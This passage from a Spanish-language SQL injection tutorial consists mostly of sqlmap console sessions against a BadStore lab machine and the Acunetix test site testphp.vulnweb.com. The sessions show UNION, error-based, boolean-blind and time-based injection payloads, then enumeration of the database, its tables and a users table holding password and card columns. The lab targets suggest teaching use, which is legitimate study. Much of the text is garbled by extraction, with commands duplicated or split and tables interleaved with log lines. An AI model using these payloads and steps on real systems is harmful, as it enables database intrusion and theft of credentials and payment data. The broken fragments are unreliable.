C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u "http://192.168.13.164/cgi-bin/bads "http://192.168.13.164/cgi-bin/badstore.cgi?se tore.cgi?se archquery=hi&action=search&x= archquery=h i&action=search&x=0&y=0" 0&y=0" --dbs sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:36:17 [10:36:17] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:36:17] [INFO] resuming injection data from session file [10:36:17] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:36:17] [INFO] resuming brute forced table name 'itemdb' from session file [10:36:17] [INFO] resuming brute forced column name 'price' for table 'itemdb' f rom session file [10:36:17] [INFO] resuming brute forced column name 'qty' for table 'itemdb' fro m session file [10:36:17] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:36:18] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:36:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database [10:36:18] [INFO] fetching database names [10:36:18] [INFO] fetching number of databases [10:36:18] [ERROR] unable to retrieve the number of databases [10:36:18] [INFO] falling back to current database [10:36:18] [INFO] fetching current database [10:36:18] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\ses
sion': badstoredb available databases [1]: [*] badstoredb [10:36:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:36:18
Iván Martín Valderas
Página 22
SQL Injection
4. Acunetix Entramos en la web y si damos unas vueltas por ella , en el apartado categories vemos que la url nos aparece ?cat=1, es un indicio in dicio para comprobar. http://testphp.vulnweb.com/listproducts.php?cat=1
Vamos a sqlmap y probamos con:
A) Servidor de BD y Versión C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap> sqlmap.py -u http://testphp.vulnw http://testphp.vulnweb.com/listproducts.php?cat=1 eb.com/listproducts.php?cat=1 sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:52:48 [10:52:49] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [10:52:49] [INFO] testing connection to the target url [10:52:49] [INFO] testing if the url is stable, wait a few seconds [10:52:50] [INFO] url is stable [10:52:50] [INFO] testing if GET parameter 'cat' is dynamic [10:52:50] [INFO] confirming that GET parameter 'cat' is dynamic [10:52:51] [INFO] GET parameter 'cat' is dynamic [10:52:51] [INFO] heuristic test shows that GET parameter 'cat' might be injecta
ble (possible DBMS: MySQL) [10:52:51] [INFO] testing sql injection on GET parameter 'cat' [10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAV ING clause' injectable [10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE o r HAVING clause' injectable [10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' i njectable [10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N] n sqlmap identified the following injection points with a total of 29 HTTP(s) requ ests: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT (S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[10:54:07] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake )
web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\testphp.vulnweb.com' [*] shutting down at: 10:54:07
El parámetro cat es vulnerable
Iván Martín Valderas
Página 24
SQL Injection
B) Nombre de la BD C:\sqlmap-0.9\sqlmap>sqlmap.py - u http://testphp.vulnw C:\sqlmap-0.9\sqlmap>sqlmap.py http://testphp.vulnweb.com/listproducts.php?ca eb.com/listproducts.php?ca t=1 --current-db sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:52:15 [11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:52:15] [INFO] resuming injection data from session file [11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:52:15] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT (S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:52:16] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:52:16] [INFO] fetching current database
[11:52:18] [INFO] retrieved: acuart current database: 'acuart' [11:52:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\testphp.vulnweb.com' [*] shutting down at: 11:52:18
C) Tablas C:\sqlmap-0.9\sqlmap>sqlmap.py - u http://testphp.vulnw C:\sqlmap-0.9\sqlmap>sqlmap.py http://testphp.vulnweb.com/listproducts.php?ca eb.com/listproducts.php?ca t=1 --tables -D acuart sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:54:12 [11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:54:12] [INFO] resuming injection data from session file [11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:54:12] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT (S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:54:14] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:54:14] [INFO] fetching tables for database 'acuart' [11:54:14] [INFO] the SQL query used returns 7 entries [11:54:15] [INFO] retrieved: acuart [11:54:15] [INFO] retrieved: artists [11:54:15] [INFO] retrieved: acuart [11:54:15] [INFO] retrieved: carts [11:54:16] [INFO] retrieved: acuart [11:54:16] [INFO] retrieved: categ [11:54:16] [INFO] retrieved: acuart [11:54:16] [INFO] retrieved: featured [11:54:17] [INFO] retrieved: acuart [11:54:17] [INFO] retrieved: guestbook [11:54:17] [INFO] retrieved: acuart [11:54:17] [INFO] retrieved: pictures [11:54:18] [INFO] retrieved: acuart [11:54:18] [INFO] retrieved: users
Database: acuart [7 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | users | +-----------+
Iván Martín Valderas
Página 26
SQL Injection
D) Columnas C:\sqlmap-0.9\sqlmap>sqlmap.py - u http://testphp.vulnw C:\sqlmap-0.9\sqlmap>sqlmap.py http://testphp.vulnweb.com/listproducts.php?ca eb.com/listproducts.php?ca t=1 --columns -T users -D acuart sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:56:55 [11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:56:55] [INFO] resuming injection data from session file [11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:56:55] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT (S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:56:56] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:56:56] [INFO] fetching columns for table 'users' on database 'acuart' [11:56:56] [INFO] the SQL query used returns 8 entries [11:56:56] [INFO] retrieved: uname [11:56:56] [INFO] retrieved: varchar(100) [11:56:57] [INFO] retrieved: pass [11:56:57] [INFO] retrieved: varchar(100) [11:56:57] [INFO] retrieved: cc Database: acuart [11:56:58] [INFO] retrieved: varchar(100) [11:56:58] [INFO] retrieved: address Table: users [11:56:58] [INFO] retrieved: mediumtext [8 columns] [11:56:58] [INFO] retrieved: email +---------+--------------+ [11:56:58] [INFO] retrieved: varchar(100) | Column | Type | [11:56:58] [INFO] retrieved: name [11:56:59] [INFO] retrieved: varchar(100) +---------+--------------+ [11:56:59] [INFO] retrieved: phone | address | mediumtext | [11:56:59] [INFO] retrieved: varchar(100) | cart | varchar(100) | [11:56:59] [INFO] retrieved: cart | cc | varchar(100) | [11:56:59] [INFO] retrieved: varchar(100)
| email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(10 varchar(100) 0) | | uname | varchar(100) | +---------+--------------+